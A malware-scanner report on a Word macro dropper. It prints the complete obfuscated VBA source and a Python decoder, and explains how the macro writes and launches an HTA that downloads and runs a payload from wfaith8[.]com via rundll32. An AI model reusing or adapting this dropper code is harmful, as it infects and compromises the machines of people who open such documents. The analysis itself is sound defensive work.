MALICIOUS
Risk Score: 172
Heuristics: 7
-
ClamAV: Doc.Dropper.Generic-9823794-0 [critical] CLAMAV_DETECTION
ClamAV detected this file as malware: Doc.Dropper.Generic-9823794-0. Note that the two artifacts carved from this sample (listed under Extracted artifacts) each report "No threats found"; the signature hit is on the submitted document itself, so a ClamAV scan of the carved VBA alone returns nothing.
-
VBA project inside OOXML [medium] OOXML_VBA (3 related findings)
Document contains a VBA project (word/vbaProject.bin); VBA macros are present.
-
CreateObject call [high] OLE_VBA_CREATEOBJ
Matched line in script:
Set aY8Ws = CreateObject(amaLIb("e" & "gas" & "sem.odc"))
The ProgID is not a literal: amaLIb() reverses its argument, so "egassem.odc" resolves to "cdo.message" only at run time. Reversal and concatenation of this kind are what keep a plain grep for known ProgIDs from matching the source.
-
VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the finding's detail line (not reproduced in this export).
-
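The two-token rule above, as an added example that is not part of the report or of its analysis tooling: a minimal Python re-implementation run over constructed sample streams. The token lists are the ones named in the finding text; the function names and the five sample streams (including the NUL-separated byte string standing in for a p-code string table) are made up here for illustration.

```python
"""
Added example: minimal version of OLE_VBA_PCODE_AUTOEXEC_EXEC.
The rule fires only when an auto-exec entry point AND an
execution/download token co-occur in the same stream.
Token lists are taken from the finding text; sample streams are constructed.
"""
import re

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream, tokens):
    """Return the tokens present in a VBA source string or a raw p-code /
    string-table stream. Bytes are mapped through latin-1 so identifier
    names inside a binary stream stay searchable. Matching is
    case-insensitive and bounded, so 'PowerShellLike' is not 'PowerShell'."""
    text = stream.decode("latin-1") if isinstance(stream, bytes) else stream
    found = []
    for tok in tokens:
        pat = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pat, text, re.IGNORECASE):
            found.append(tok)
    return found


def pcode_autoexec_exec(stream):
    """The heuristic itself: fires only when BOTH token classes are present."""
    autoexec = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return {"fires": bool(autoexec) and bool(execs),
            "autoexec": autoexec, "exec": execs}


# --- constructed sample streams (not carved from the real sample) ----------
# 1. Source shaped like this report's preview: AutoOpen plus CreateObject.
SRC_DROPPER = (
    'Sub AutoOpen()\n    aaFNS\nEnd Sub\n'
    'Function auZIzw(arTWgL)\n'
    '    Set aY8Ws = CreateObject(amaLIb("e" & "gas" & "sem.odc"))\n'
    'End Function\n'
)
# 2. Auto-exec entry point but no execution token: must NOT fire.
SRC_BENIGN_AUTOEXEC = (
    'Private Sub Document_Open()\n'
    '    ActiveDocument.Variables("opened") = Now\n'
    'End Sub\n'
)
# 3. Execution token but no auto-exec entry point: must NOT fire.
SRC_HELPER_ONLY = (
    'Function ReadCfg(p)\n'
    '    Set fso = CreateObject("Scripting.FileSystemObject")\n'
    '    ReadCfg = fso.OpenTextFile(p).ReadAll\n'
    'End Function\n'
)
# 4. Source stripped (p-code only): identifier names survive in the string
#    table as NUL-separated bytes, and the pairing is still visible there.
PCODE_ONLY = (b"\x00\x00_B_var_\x00Workbook_Open\x00Sheet1\x00"
              b"URLDownloadToFile\x00urlmon\x00\x00")
# 5. Lookalike identifiers must not match because of the boundary check.
SRC_LOOKALIKE = 'Sub AutoOpenHelper()\n    x = PowerShellLike\nEnd Sub\n'

if __name__ == "__main__":
    for label, s in (("dropper", SRC_DROPPER), ("benign", SRC_BENIGN_AUTOEXEC),
                     ("helper", SRC_HELPER_ONLY), ("pcode", PCODE_ONLY),
                     ("lookalike", SRC_LOOKALIKE)):
        print(f"{label:9} -> {pcode_autoexec_exec(s)}")
```

The byte-string case is the one the finding is really about: when olevba cannot recover source, the identifier names still sit in the module's string table, which is enough for a co-occurrence check. The example covers only the matching logic; locating and decompressing the real streams inside vbaProject.bin is left to oletools.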
AutoOpen macro [low] OLE_VBA_AUTOOPEN
Matched line in script:
Sub AutoOpen()
-
Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL [info] EMBEDDED_URL
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Caveat: every URL below is an XML namespace or schema identifier (Office OOXML markup namespaces, plus XMP/RDF/Dublin Core/Photoshop metadata namespaces that usually come from an embedded image), and all were found in document text (OOXML body / shared strings). Such URIs are present in essentially every .docx and are not network indicators for this sample. The macro's actual download URL, hxxp://wfaith8[.]com/forum/viewpost/..., exists only base64-encoded inside the HTA stage assembled in Sub aaFNS and therefore does not surface in this list.
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
- http://schemas.microsoft.com/office/drawing/2014/chartex
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
- http://schemas.openxmlformats.org/markup-compatibility/2006
- http://schemas.microsoft.com/office/drawing/2016/ink
- http://schemas.microsoft.com/office/drawing/2017/model3d
- http://schemas.openxmlformats.org/officeDocument/2006/relationships
- http://schemas.openxmlformats.org/officeDocument/2006/math
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
- http://schemas.openxmlformats.org/wordprocessingml/2006/main
- http://schemas.microsoft.com/office/word/2010/wordml
- http://schemas.microsoft.com/office/word/2012/wordml
- http://schemas.microsoft.com/office/word/2018/wordml/cex
- http://schemas.microsoft.com/office/word/2016/wordml/cid
- http://schemas.microsoft.com/office/word/2018/wordml
- http://schemas.microsoft.com/office/word/2015/wordml/symex
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
- http://schemas.microsoft.com/office/word/2010/wordprocessingInk
- http://schemas.microsoft.com/office/word/2006/wordml
- http://schemas.microsoft.com/office/word/2010/wordprocessingShape
- http://ns.adobe.com/xap/1.0/
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/photoshop/1.0/
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8413 bytes |

SHA-256: 27cf2ab221e14239510256d94562522e88984b4d554688669b2bfaa044256d3d
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 5 long base64-like blob(s)).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "awOgue"
Sub AutoOpen()
aaFNS
End Sub
Attribute VB_Name = "aWpfh7"
Sub aIpit(apqzJj, aKCen)
' Wondering prays welding
' South-eastern attract
' Node sicilian many modelling
' Sluggard bail nbc
' Cook closing valencia cringe
' Businesslike
' Randy
' Beginning
' Michel talks clock
' Sold
' Nvidia luscious
End Sub
Attribute VB_Name = "awpiY"
Public Const aOBZCw As String = "21232f297a57a5a743894a0e4a801fc3"
Public Const aWiEfe As String = "utf-8"
Function amaLIb(awrMUs)
a9eFrU = 1
aD32M = Len(awrMUs)
asX0a = ""
For aXdGr = 1 To aD32M
asX0a = Mid(awrMUs, aXdGr, 1) & asX0a
' Program magnesia
' Focus thumbnail studied
' Gorgeous accessing incompetent
' Infringement emphasize blubber
' Chronic crossbow
' Destination
' Country professor peruse
Next aXdGr
' Contacted prostitute
' Rake tons absences lung
' Envelope bridal
' Disorganized spinster mortality
' Greenhouse pedal directory
' Archibald perception illinois stumped optic abbeys
' Necktie dallas lire priceless extracting bankruptcy
' Seafood artistic abridged illogical aniline inferiority
' National this bbs
' Whatever swag productivity apoplexy
' Focus
' Ravages islands loft
' Weblog flows
' Pen detriment mulberry whilst switched boatswain
amaLIb = asX0a
End Function
Function auZIzw(arTWgL)
Set aY8Ws = CreateObject(amaLIb("e" & "gas" & "sem.odc"))
With aY8Ws.BodyPart
' Fatigues end mistakes
' Underwent pursuant
' Nouns challenged
.ContentTransferEncoding = amaLIb("46e" & "sab")
With .GetEncodedContentStream
.WriteText arTWgL
.Flush
End With
With .GetDecodedContentStream
.Charset = aWiEfe
auZIzw = .ReadText
End With
End With
' Inclusive lean-to
' Eucalyptus calabria
' Enormous baker favors
' Circumcision duality orbs entity accompanied
' Impediment hypnotic consumer admonish fantasy forage
' Novels critically propecia clam
' Application scenario
' Ecclesiastes veneer dairy reasons
' Progressive rehabilitation demonstration
' Greensboro
' Cornwall warwickshire
End Function
Sub a6pB2w(abXcW, aBpP3u)
' Compounds relaxation ozone pawn
' Dye durable whatll
' Aquatic grouse sys fifty-one vertically
' Bedford rocket totals
' Nefarious spontaneously pleasant
' Lab
' Cheapest
' Bus gunshot tomato acdbentity
' Floppy checklist offset
' Tile
' Riddled iniquitous images
' Redundant triple eel ford vaulting
' Ad
' Walk transvaal easel
' Olympics anthea
' Abridgment firewood
Open abXcW For Output As #1
Print #1, aBpP3u
Close #1
End Sub
Function Des(aJITH, aCeGcH, aZMIB)
' Connect conservative od python
' Hop
' Census unchecked laden simpson accidents
Des = Replace(auZIzw(aJITH), aCeGcH, aZMIB)
End Function
Sub aaFNS()
agjo3 = Des("Y2FURE1SOmFURE1SXGFURE1Sd2FURE1SaWFURE1SbmFURE1SZGFURE1Sb2FURE1Sd2FURE1Sc2FURE1SXGFURE1Sc2FURE1SeWFURE1Sc2FURE1SdGFURE1SZWFURE1SbWFURE1SM2FURE1SMmFURE1SXGFURE1SbWFURE1Sc2FURE1SaGFURE1SdGFURE1SYWFURE1SLmFURE1SZWFURE1SeGFURE1SZWFURE1S", "aTDMR", "")
auUb2 = Des("Y2FXNDc2bzphVzQ3Nm9cYVc0NzZvdWFXNDc2b3NhVzQ3Nm9lYVc0NzZvcmFXNDc2b3NhVzQ3Nm9cYVc0NzZvcGFXNDc2b3VhVzQ3Nm9iYVc0NzZvbGFXNDc2b2lhVzQ3Nm9jYVc0NzZvXGFXNDc2b3BhVzQ3Nm91YVc0NzZvYmFXNDc2b2xhVzQ3Nm9pYVc0NzZvY2FXNDc2by5hVzQ3Nm9jYVc0NzZvb2FXNDc2b21hVzQ3Nm8=", "aW476o", "")
' Emotional hurries messages
' Contingent humans booking pontiac wean
' Dc tanzania criterion
' Tempestuous foundry minimize repulsion
asrcC = Des("Y2FPOHVBOmFPOHVBXGFPOHVBdWFPOHVBc2FPOHVBZWFPOHVBcmFPOHVBc2FPOHVBXGFPOHVBcGFPOHVBdWFPOHVBYmFPOHVBbGFPOHVBaWFPOHVBY2FPOHVBXGFPOHVBaWFPOHVBbmFPOHVBZGFPOHVBZWFPOHVBeGFPOHVBLmFPOHVBaGFPOHVBdGFPOHVBYWFPOHVB", "aO8uA", "")
' Accomplish warm indeterminate turbo spurn expostulation
' Almanac clean
' Bizrate
' Cakes suggested pave chapter monitor
aXLYx = Des("cmFqeWNMVHVhanljTFRuYWp5Y0xUZGFqeWNMVGxhanljTFRsYWp5Y0xUM2FqeWNMVDJhanljTFQuYWp5Y0xUZWFqeWNMVHhhanljTFRlYWp5Y0xUIGFqeWNMVHVhanljTFRyYWp5Y0xUbGFqeWNMVC5hanljTFRkYWp5Y0xUbGFqeWNMVGxhanljTFQsYWp5Y0xUT2FqeWNMVHBhanljTFRlYWp5Y0xUbmFqeWNMVFVhanljTFRSYWp5Y0xUTGFqeWNMVA==", "ajycLT", "")
' Empirical yields
' Fiftieth plot soc sector whirr doing
' Constellation vanguard young
' Surrounding scared
' Innocent port movement
' Slave cassandra
' Swimmer undress
' Inter piston
' Waken ray
' Query citation et getting overlaid thoughtfulness
' Participation debauchery
aY2hl = "eQ0KCWE1SFZTdy5TYXZlVG9GaWxlIGFxamRvTywgMg0KCWE1SFZTdy5DbG9zZQ0KRW5kIElmDQoNCjwvc2NyaXB0Pg0KDQo8c2NyaXB0IGxhbmd1"
aqhKfj = "c2NyaXB0Ij4NCg0KYVg4UVNJID0gInJ1bmRsbCINCg0KSWYgYVAwMlguc3RhdHVzID0gMjAwIFRoZW4NCglTZXQgYTVIVlN3ID0gQ3JlYXRlT2Jq"
aohGbH = "YnJNcGtaaGZOJkxlalc9ZmxfUWdMaCIsIGZhbHNlKTsNCmFQMDJYLnNlbmQoKTsNCg0KPC9zY3JpcHQ+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9InZi"
aokiZq = "b2luKCIiKTsNCnZhciBhMDhFYSA9ICJudXIiLnNwbGl0KCIiKS5yZXZlcnNlKCkuam9pbigiIik7DQp2YXIgYWN1RGQgPSAici0gQWdvbGFpRHdv"
avml6a = "Mi54bWxodHRwIik7DQphUDAyWC5vcGVuKCJHRVQiLCAiaHR0cDovL3dmYWl0aDguY29tL2ZvcnVtL3ZpZXdwb3N0LzYxa0tRTl9ZbTBLN3FzdE1z"
' Petrograd authorities
' Prosaic stock auburn
' Prevention supplier advocate
aCFLM = "YWdlPSJqYXZhc2NyaXB0Ij4NCg0KdmFyIGFueFlTUSA9IG5ldyBBY3RpdmVYT2JqZWN0KGFzQW9VMylbYTA4RWFdKGFYOFFTSSArICIzMiAiICsg"
' Certitude
' Heater someone folding lunacy
' Finder capillary chew moisten adonis brunette mitchell
' Nutmeg caliph spaces beauty
atBgP = "ZWN0KCJhZG9kYi5zdHJlYW0iKQ0KCWE1SFZTdy5PcGVuDQoJYTVIVlN3LlR5cGUgPSAxDQoJYTVIVlN3LldyaXRlIGFQMDJYLnJlc3BvbnNlYm9k"
a1feI = "YXFqZG9PICsgYWN1RGQpOw0Kd2luZG93LmNsb3NlKCk7DQoNCjwvc2NyaXB0Pg=="
' Blessed denver
' Palmy nsw wrestling container
' Costumes nominative shiny sending tr
' Genre
aS4Wyd = "aFMsIi5zcGxpdCgiIikucmV2ZXJzZSgpLmpvaW4oIiIpOw0KdmFyIGFxamRvTyA9ICJjOlxccHJvZ3JhbWRhdGFcXGFMUVpBLnBkZiI7DQoNCndp"
' Pheasant dates intrepid
' Intranet soliloquy burst
' Decor baptismal expedite
' Migrant scathing half emptiness
afd9y = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQoNCnZhciBhc0FvVTMgPSAibGxlaHMudHBpcmNzdyIuc3BsaXQoIiIpLnJldmVyc2UoKS5q"
as34k = "bmRvdy5yZXNpemVUbygxLCAxKTsNCndpbmRvdy5tb3ZlVG8oLTEwLCAtMTApOw0KdmFyIGFQMDJYID0gbmV3IEFjdGl2ZVhPYmplY3QoIm1zeG1s"
a34Km = "YS9SSmpxMDRoNk9Rdks2QmIvZmZzbGFleTk/QW9KPVNfZGpCYyZOd1RHPUp4UEtoS2ZYJk1qPWZVYkFmZXp6SHJzQXJfRCZsSENBPU1yRW1rSXND"
' Constructed heterodox ulcer
' Stilled specifies thirty-seven
' Tap misanthropy bingo studio
' Underlie thereabout actual north-eastern
aBpP3u = auZIzw(afd9y & aokiZq & aS4Wyd & as34k & avml6a & a34Km & aohGbH & aqhKfj & atBgP & aY2hl & aCFLM & a1feI)
a6pB2w asrcC, aBpP3u
' Ul
' Engulf knocker
' Illuminate indiscriminate
' Designer yorkshire central
' Mammoth ez candidly hazard
' Guatemala relevance elsewhere pn aberrations porter
' Remarks ae yemen
' Wt evangelist
' Ff wherever
' Alexandra sicilian si pg decorative st premiere
' Apache saw eskimo
' Alberta cooler minerals comics emmanuel flow
' Uncanny
' Propeller adjacent girt
' Gypsy nearby zealously
' Pentium five titans
' Councillor
' Confounds
' Tgp booby
' Bobby drainage
' Frequencies unconvinced decades urgency
' Dozens
' Feet hitting maidenhead
' Crate loose
' Mote
' Honeymoon unpremeditated
' Survival
aaGbjK = Des("d2EzZzJFdXNhM2cyRXVjYTNnMkV1cmEzZzJFdWlhM2cyRXVwYTNnMkV1dGEzZzJFdS5hM2cyRXVzYTNnMkV1aGEzZzJFdWVhM2cyRXVsYTNnMkV1bGEzZzJFdQ==", "a3g2Eu", "")
CreateObject(aaGbjK).run (aXLYx & " " & asrcC)
End Sub
Attribute VB_Name = "aChxWo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Younger worship
' Clerk buried bb
' Phpbb
' Canon skip snake internship isis
Function azVcvA(aEFAW1)
' Killing gl wright friday respiration
' Obloquy analytic laugh taint
' Newer sloth realtor waif
' Received iron abyssinia benny bhutan
' Inquisitiveness teens cheese
' Protein admissible expenses comments
' King acquisition
' Distort searching statewide coding
' Dwindle trap appearing youth flash noise
' Amazon wellington
' Installations hermes
End Function
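The string obfuscation in the preview above is fully reversible from the source alone. As an added example that is not part of the report or of the sample, the Python below re-implements the macro's three primitives and applies them to the base64 literals copied verbatim from Sub aaFNS, so the strings the macro would build at AutoOpen time can be recovered without opening the document. amaLIb, auZIzw and Des keep the macro's names so the two can be read side by side; decode_macro_strings, decode_hta_stage, run_command and extract_urls are names chosen for this example.

```python
"""
Added example (not from the report or the sample): recover the strings
the extracted macro builds at run time.

  amaLIb(s)        reverses s
  auZIzw(b64)      base64 -> UTF-8 text (the macro does this via CDO.Message)
  Des(b64, junk)   auZIzw(b64) with the per-character junk marker removed
"""
import base64
import re


def amaLIb(s):
    """Macro's amaLIb: prepends one character at a time, i.e. reverses s
    ("egassem.odc" -> "cdo.message", "46esab" -> "base64")."""
    return s[::-1]


def auZIzw(b64):
    """Macro's auZIzw: CDO.Message BodyPart, ContentTransferEncoding "base64",
    Charset "utf-8". A plain base64 decode to UTF-8 text is equivalent."""
    return base64.b64decode(b64).decode("utf-8")


def Des(b64, junk, repl=""):
    """Macro's Des: decode, then Replace() the junk marker with repl."""
    return auZIzw(b64).replace(junk, repl)


# (base64 literal, junk marker) pairs exactly as passed to Des in aaFNS.
DES_ARGS = {
    "agjo3": ("Y2FURE1SOmFURE1SXGFURE1Sd2FURE1SaWFURE1SbmFURE1SZGFURE1Sb2FURE1Sd2FURE1Sc2FURE1SXGFURE1Sc2FURE1SeWFURE1Sc2FURE1SdGFURE1SZWFURE1SbWFURE1SM2FURE1SMmFURE1SXGFURE1SbWFURE1Sc2FURE1SaGFURE1SdGFURE1SYWFURE1SLmFURE1SZWFURE1SeGFURE1SZWFURE1S", "aTDMR"),
    "auUb2": ("Y2FXNDc2bzphVzQ3Nm9cYVc0NzZvdWFXNDc2b3NhVzQ3Nm9lYVc0NzZvcmFXNDc2b3NhVzQ3Nm9cYVc0NzZvcGFXNDc2b3VhVzQ3Nm9iYVc0NzZvbGFXNDc2b2lhVzQ3Nm9jYVc0NzZvXGFXNDc2b3BhVzQ3Nm91YVc0NzZvYmFXNDc2b2xhVzQ3Nm9pYVc0NzZvY2FXNDc2by5hVzQ3Nm9jYVc0NzZvb2FXNDc2b21hVzQ3Nm8=", "aW476o"),
    "asrcC": ("Y2FPOHVBOmFPOHVBXGFPOHVBdWFPOHVBc2FPOHVBZWFPOHVBcmFPOHVBc2FPOHVBXGFPOHVBcGFPOHVBdWFPOHVBYmFPOHVBbGFPOHVBaWFPOHVBY2FPOHVBXGFPOHVBaWFPOHVBbmFPOHVBZGFPOHVBZWFPOHVBeGFPOHVBLmFPOHVBaGFPOHVBdGFPOHVBYWFPOHVB", "aO8uA"),
    "aXLYx": ("cmFqeWNMVHVhanljTFRuYWp5Y0xUZGFqeWNMVGxhanljTFRsYWp5Y0xUM2FqeWNMVDJhanljTFQuYWp5Y0xUZWFqeWNMVHhhanljTFRlYWp5Y0xUIGFqeWNMVHVhanljTFRyYWp5Y0xUbGFqeWNMVC5hanljTFRkYWp5Y0xUbGFqeWNMVGxhanljTFQsYWp5Y0xUT2FqeWNMVHBhanljTFRlYWp5Y0xUbmFqeWNMVFVhanljTFRSYWp5Y0xUTGFqeWNMVA==", "ajycLT"),
    "aaGbjK": ("d2EzZzJFdXNhM2cyRXVjYTNnMkV1cmEzZzJFdWlhM2cyRXVwYTNnMkV1dGEzZzJFdS5hM2cyRXVzYTNnMkV1aGEzZzJFdWVhM2cyRXVsYTNnMkV1bGEzZzJFdQ==", "a3g2Eu"),
}

# The twelve chunks joined into aBpP3u, in the order the macro concatenates them
# (afd9y, aokiZq, aS4Wyd, as34k, avml6a, a34Km, aohGbH, aqhKfj, atBgP, aY2hl, aCFLM, a1feI).
HTA_CHUNKS = (
    "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQoNCnZhciBhc0FvVTMgPSAibGxlaHMudHBpcmNzdyIuc3BsaXQoIiIpLnJldmVyc2UoKS5q",
    "b2luKCIiKTsNCnZhciBhMDhFYSA9ICJudXIiLnNwbGl0KCIiKS5yZXZlcnNlKCkuam9pbigiIik7DQp2YXIgYWN1RGQgPSAici0gQWdvbGFpRHdv",
    "aFMsIi5zcGxpdCgiIikucmV2ZXJzZSgpLmpvaW4oIiIpOw0KdmFyIGFxamRvTyA9ICJjOlxccHJvZ3JhbWRhdGFcXGFMUVpBLnBkZiI7DQoNCndp",
    "bmRvdy5yZXNpemVUbygxLCAxKTsNCndpbmRvdy5tb3ZlVG8oLTEwLCAtMTApOw0KdmFyIGFQMDJYID0gbmV3IEFjdGl2ZVhPYmplY3QoIm1zeG1s",
    "Mi54bWxodHRwIik7DQphUDAyWC5vcGVuKCJHRVQiLCAiaHR0cDovL3dmYWl0aDguY29tL2ZvcnVtL3ZpZXdwb3N0LzYxa0tRTl9ZbTBLN3FzdE1z",
    "YS9SSmpxMDRoNk9Rdks2QmIvZmZzbGFleTk/QW9KPVNfZGpCYyZOd1RHPUp4UEtoS2ZYJk1qPWZVYkFmZXp6SHJzQXJfRCZsSENBPU1yRW1rSXND",
    "YnJNcGtaaGZOJkxlalc9ZmxfUWdMaCIsIGZhbHNlKTsNCmFQMDJYLnNlbmQoKTsNCg0KPC9zY3JpcHQ+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9InZi",
    "c2NyaXB0Ij4NCg0KYVg4UVNJID0gInJ1bmRsbCINCg0KSWYgYVAwMlguc3RhdHVzID0gMjAwIFRoZW4NCglTZXQgYTVIVlN3ID0gQ3JlYXRlT2Jq",
    "ZWN0KCJhZG9kYi5zdHJlYW0iKQ0KCWE1SFZTdy5PcGVuDQoJYTVIVlN3LlR5cGUgPSAxDQoJYTVIVlN3LldyaXRlIGFQMDJYLnJlc3BvbnNlYm9k",
    "eQ0KCWE1SFZTdy5TYXZlVG9GaWxlIGFxamRvTywgMg0KCWE1SFZTdy5DbG9zZQ0KRW5kIElmDQoNCjwvc2NyaXB0Pg0KDQo8c2NyaXB0IGxhbmd1",
    "YWdlPSJqYXZhc2NyaXB0Ij4NCg0KdmFyIGFueFlTUSA9IG5ldyBBY3RpdmVYT2JqZWN0KGFzQW9VMylbYTA4RWFdKGFYOFFTSSArICIzMiAiICsg",
    "YXFqZG9PICsgYWN1RGQpOw0Kd2luZG93LmNsb3NlKCk7DQoNCjwvc2NyaXB0Pg==",
)


def decode_macro_strings():
    """All five Des() results, keyed by the macro's own variable names."""
    return {name: Des(b64, junk) for name, (b64, junk) in DES_ARGS.items()}


def decode_hta_stage():
    """Text the macro writes to the asrcC path via a6pB2w (Open / Print #1)."""
    return auZIzw("".join(HTA_CHUNKS))


def run_command():
    """Argument handed to CreateObject(aaGbjK).run at the end of aaFNS."""
    s = decode_macro_strings()
    return s["aXLYx"] + " " + s["asrcC"]


def extract_urls(text):
    """Network indicators exist only inside the decoded second stage."""
    return re.findall(r'https?://[^\s"\'<>]+', text)


if __name__ == "__main__":
    print("ProgIDs:", amaLIb("e" + "gas" + "sem.odc"), "/", amaLIb("46e" + "sab"))
    for name, value in decode_macro_strings().items():
        print(f"{name:7} = {value}")
    print("run     =", run_command())
    hta = decode_hta_stage()
    print("URLs    =", extract_urls(hta))
    print(hta)
```

Running it shows the chain the heuristics only hint at: the macro drops the decoded HTA to c:\users\public\index.hta and launches it with "rundll32.exe url.dll,OpenURL c:\users\public\index.hta" through WScript.Shell. The HTA in turn fetches hxxp://wfaith8[.]com/forum/viewpost/... with MSXML2.XMLHTTP, saves the response through ADODB.Stream as c:\programdata\aLQZA.pdf, and runs it with rundll32 ...,ShowDialogA -r. Two decoded strings (agjo3 = c:\windows\system32\mshta.exe and auUb2 = c:\users\public\public.com) are assigned but never used. None of the base64 chunks alone is a recognisable indicator, which is why the EMBEDDED_URL finding above sees only XML namespaces.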

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 34816 bytes |

SHA-256: d112d07585408e0c5e7570a62b48b9c228831514995ccdf155b5fbc07b621c3c
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 5 long base64-like blob(s)).